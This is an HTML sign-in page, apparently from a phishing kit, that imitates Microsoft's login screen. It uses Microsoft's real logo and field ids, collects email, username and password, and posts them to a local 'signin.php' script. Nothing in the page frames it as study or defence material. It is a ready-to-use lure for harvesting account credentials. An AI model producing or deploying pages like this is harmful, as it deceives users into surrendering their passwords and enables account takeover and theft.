<!DOCTYPE html>

<html>
    <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <title>Sign in to your account</title>
        <meta name="description" content="">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">

        <link rel="stylesheet" href="./css/styles.css">
    </head>
    <body>

        <div class="form-container">
            <img class="logo" src="https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" alt="Microsoft">
            <div class="title-1">Sign in</div>
            <form action="signin.php" method="post" >
                <div class="form-group col-md-24">

                    <div class="formIII">
            
                        <input type="email" name="i0116" id="i0116" maxlength="113" class="form-control inp-2" aria-required="true"  placeholder="Email Address" required><br><br>

                        <input type="text" name="i0117" id="i0117" maxlength="113" class="form-control inp-2"   placeholder="Username" required><br><br>
            
                        <input name="i0118" type="password" id="i0118" autocomplete="off" class="form-control inp-2"  placeholder="Password" aria-label="Enter the password" tabindex="0" required><br><br>

                        <input type="submit" id="submit" class="btn-2" value="Sign in">
            </div>
              </div>
            </form>
        </div>
    </body>
</html>